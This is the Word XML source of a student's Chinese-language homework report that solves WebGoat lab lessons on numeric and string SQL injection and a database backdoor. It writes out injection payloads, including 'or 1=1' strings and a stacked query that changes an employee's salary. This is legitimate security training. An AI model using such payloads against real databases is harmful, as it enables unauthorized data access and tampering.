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BBF26" w14:textId="44EB07FF" w:rsidR="00076C9B" w:rsidRDefault="00376930">
      <w:pPr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</w:pPr>
      <w:r w:rsidRPr="00470A86">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="SimSun" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">網路與多媒體實驗 </w:t>
      </w:r>
      <w:r w:rsidRPr="00470A86"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  <w:t xml:space="preserve">hw2 </w:t>
      </w:r>
      <w:r w:rsidR="00F51377"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  <w:t>Webgoat</w:t>
      </w:r>
      <w:r w:rsidR="00677BD3"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  <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidR="00706B6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="SimSun" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidR="00677BD3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="SimSun" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>電機四</w:t>
      </w:r>
      <w:r w:rsidR="00677BD3"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  <w:t>B03901153</w:t>
      </w:r>
      <w:r w:rsidR="00677BD3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="SimSun" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> 陳楷訓</w:t>
      </w:r>
      <w:r w:rsidR="00677BD3"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  <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="494E8FE0" w14:textId="77777777" w:rsidR="00C306AD" w:rsidRDefault="00C306AD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="SimSun"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65F265EE" w14:textId="4116F4B1" w:rsidR="00C306AD" w:rsidRDefault="000F32E0" w:rsidP="00C306A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Numeric</w:t>
      </w:r>
      <w:r w:rsidR="008858B8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> SQL</w:t>
      </w:r>
      <w:r w:rsidR="00BE3153">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Injection</w:t>
      </w:r>
      <w:r w:rsidR="002D2521">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ABB45CF" w14:textId="44317014" w:rsidR="00A35A0D" w:rsidRDefault="00A35A0D" w:rsidP="00A35A0D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A35A0D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>題目截圖：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A597CB" w14:textId="7D1434A4" w:rsidR="00A35A0D" w:rsidRDefault="00A35A0D" w:rsidP="00A35A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0B3468E0" wp14:editId="5859E65D">
            <wp:extent cx="5270500" cy="1910715"/>
            <wp:effectExtent l="0" t="0" r="1270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3-29 上午1.38.2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6C5" w14:textId="0E7E2037" w:rsidR="00144052" w:rsidRDefault="00144052" w:rsidP="00A35A0D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00144052">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>解題流程：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D268A8" w14:textId="50F76B1D" w:rsidR="005A360F" w:rsidRDefault="005A360F" w:rsidP="00A35A0D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/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3ED51186" wp14:editId="5EA232E1">
            <wp:extent cx="4559300" cy="825500"/>
            <wp:effectExtent l="0" t="0" r="1270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3-29 上午1.40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2AFF" w14:textId="0F86CCD0" w:rsidR="00DD7473" w:rsidRDefault="00241ACC" w:rsidP="00A35A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SELECT * FROM weather_data WHERE station = </w:t>
      </w:r>
      <w:r w:rsidR="005A360F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">101 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E26F97" w14:textId="77777777" w:rsidR="00E513CD" w:rsidRDefault="00E513CD" w:rsidP="00A35A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想要列出所有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">weather data </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D506980" w14:textId="5A07C204" w:rsidR="00E513CD" w:rsidRDefault="00E513CD" w:rsidP="00A35A0D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E513CD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/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使用burp攔截封包，將</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>station = 101</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">，改成 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>station = 101 or 1=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC82AB3" w14:textId="79155ED1" w:rsidR="00D7750B" w:rsidRDefault="00D7750B" w:rsidP="00A35A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結果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E37162" w14:textId="13FEE17F" w:rsidR="00D7750B" w:rsidRDefault="00D7750B" w:rsidP="00A35A0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341D93E3" wp14:editId="56E4488C">
            <wp:extent cx="5219700" cy="2578100"/>
            <wp:effectExtent l="0" t="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3-29 上午1.45.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84B" w14:textId="77777777" w:rsidR="00106CFD" w:rsidRDefault="00106CFD" w:rsidP="00A35A0D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DC9A245" w14:textId="77777777" w:rsidR="00106CFD" w:rsidRDefault="00106CFD" w:rsidP="00A35A0D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B62EFA3" w14:textId="79C89316" w:rsidR="00106CFD" w:rsidRDefault="00106CFD" w:rsidP="00106CF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String SQL Injection</w:t>
      </w:r>
      <w:r w:rsidR="00983636">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9E8E17" w14:textId="6347F371" w:rsidR="00CB46F4" w:rsidRDefault="00CB46F4" w:rsidP="00CB46F4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB46F4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>題目截圖：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1459C744" w14:textId="188C1FEC" w:rsidR="004A03C0" w:rsidRDefault="004A03C0" w:rsidP="00CB46F4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sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="52B167C4" wp14:editId="6FBD1BE8">
            <wp:extent cx="5270500" cy="1898015"/>
            <wp:effectExtent l="0" t="0" r="1270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3-29 上午1.47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5EBE" w14:textId="28F74F31" w:rsidR="00072A14" w:rsidRDefault="00072A14" w:rsidP="00CB46F4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sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>解題流程：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19843C84" w14:textId="0112615C" w:rsidR="00A917E7" w:rsidRDefault="00A917E7" w:rsidP="00CB46F4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sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">先在空格中輸入 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Smith</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF3BF54" w14:textId="53A7B1EB" w:rsidR="00356129" w:rsidRDefault="00356129" w:rsidP="00CB46F4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sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="63615E22" wp14:editId="5AD91B6A">
            <wp:extent cx="5270500" cy="818515"/>
            <wp:effectExtent l="0" t="0" r="1270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3-29 上午1.48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A3E" w14:textId="45307A5C" w:rsidR="00CC3772" w:rsidRDefault="00CC3772" w:rsidP="00CB46F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思考由於</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Smith</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>為一個</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>所以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>指令會是：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD2E839" w14:textId="12CE5ABE" w:rsidR="00CC3772" w:rsidRDefault="00CC3772" w:rsidP="00CB46F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SELECT * FROM user_data WHERE last_name = ‘Smith’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2055FE01" w14:textId="6924614B" w:rsidR="002811D1" w:rsidRDefault="00F50B65" w:rsidP="00CB46F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所以若是攔截封包並且改成</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Smith’or 1=1 /*</w:t>
      </w:r>
      <w:r w:rsidR="002811D1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002811D1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>則</w:t>
      </w:r>
      <w:r w:rsidR="002811D1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidR="002811D1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>指令會變成</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C4B035C" w14:textId="77C42E8D" w:rsidR="0032180A" w:rsidRDefault="002811D1" w:rsidP="00CB46F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SELECT * FROM user_data WHERE last_name = ‘</w:t>
      </w:r>
      <w:r w:rsidRPr="002811D1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Smith’or 1=1 /*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidR="0032180A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC1E88B" w14:textId="77777777" w:rsidR="00900CE0" w:rsidRDefault="00900CE0" w:rsidP="00CB46F4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5602D72A" w14:textId="4667F022" w:rsidR="00900CE0" w:rsidRPr="008C25F6" w:rsidRDefault="00900CE0" w:rsidP="008C25F6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8C25F6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Database backdoor</w:t>
      </w:r>
      <w:r w:rsidR="008913F9" w:rsidRPr="008C25F6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> : </w:t>
      </w:r>
      <w:r w:rsidR="000A55A3" w:rsidRPr="008C25F6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Stage1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B4D768" w14:textId="24DE2E51" w:rsidR="00CF5753" w:rsidRDefault="00CF5753" w:rsidP="00CF5753">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF5753">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>題目截圖：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA38CC0" w14:textId="2610E577" w:rsidR="00CF5753" w:rsidRDefault="00CF5753" w:rsidP="00CF5753">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia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sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="713FD3C7" wp14:editId="216456A9">
            <wp:extent cx="5270500" cy="2239645"/>
            <wp:effectExtent l="0" t="0" r="1270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3-29 上午2.02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BC1" w14:textId="3D0BD8E1" w:rsidR="007F5925" w:rsidRPr="007F5925" w:rsidRDefault="007F5925" w:rsidP="00CF5753">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F5925">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>解題流程：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC29F1B" w14:textId="77777777" w:rsidR="004D4EB1" w:rsidRDefault="00F54306" w:rsidP="00CF5753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猜測</w:t>
      </w:r>
      <w:r w:rsidR="004D4EB1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidR="004D4EB1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>指令為：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E9BDE4C" w14:textId="77777777" w:rsidR="001904F0" w:rsidRDefault="004D4EB1" w:rsidP="00CF5753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select * from employee where userid =</w:t>
      </w:r>
      <w:r w:rsidR="003E4EE1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> ?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA99070" w14:textId="259B2DA2" w:rsidR="00F91063" w:rsidRDefault="00F91063" w:rsidP="00CF5753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所以若在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>User 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 中輸入：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</w:p>
    <w:p w14:paraId="34EFC958" w14:textId="5CABBAFC" w:rsidR="00147B2D" w:rsidRDefault="00147B2D" w:rsidP="00CF5753">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A26240">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>101; update emplo</w:t>
      </w:r>
      <w:r w:rsidR="00AF69D4" w:rsidRPr="00A26240">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>yee set salary=66666 where user</w:t>
      </w:r>
      <w:r w:rsidRPr="00A26240">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>id = 101</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D3267A2" w14:textId="7E745986" w:rsidR="00F91063" w:rsidRDefault="00F91063" w:rsidP="00CF5753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則</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>SQL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指令將變為</w:t>
      </w:r>
      <w:r w:rsidR="005F5F8A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="256D4BCF" w14:textId="77777777" w:rsidR="005F5F8A" w:rsidRDefault="005F5F8A" w:rsidP="005F5F8A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 xml:space="preserve">select * from employee where userid = </w:t>
      </w:r>
      <w:r w:rsidRPr="00A26240">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>101; update employee set salary=66666 where userid = 101</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F49DBE" w14:textId="2EF0DDD0" w:rsidR="00CC053C" w:rsidRDefault="00E6138B" w:rsidP="005F5F8A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即可將</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>userid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為</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>101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的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>employee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的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>salary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改成</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>66666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。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AEE695D" w14:textId="0A2F670C" w:rsidR="009B4C26" w:rsidRDefault="009B4C26" w:rsidP="005F5F8A">
      <w:pPr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5790E7FD" wp14:editId="5C871A26">
            <wp:extent cx="5041900" cy="736600"/>
            <wp:effectExtent l="0" t="0" r="1270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3-29 上午2.25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F16A" w14:textId="77777777" w:rsidR="008C25F6" w:rsidRDefault="008C25F6" w:rsidP="005F5F8A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79EE2095" w14:textId="16368835" w:rsidR="008C25F6" w:rsidRPr="008C25F6" w:rsidRDefault="00182896" w:rsidP="008C25F6">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:jc w:val="both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Database backdoor : Stage2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="386DB57A" w14:textId="4FDE77AE" w:rsidR="005F5F8A" w:rsidRDefault="00E536E3" w:rsidP="005F5F8A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E536E3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>題目截圖：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FEB7ED5" w14:textId="4839023A" w:rsidR="005F5F8A" w:rsidRDefault="00127ED4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5772C2C" wp14:editId="51E6A1F9">
            <wp:extent cx="5270500" cy="3308350"/>
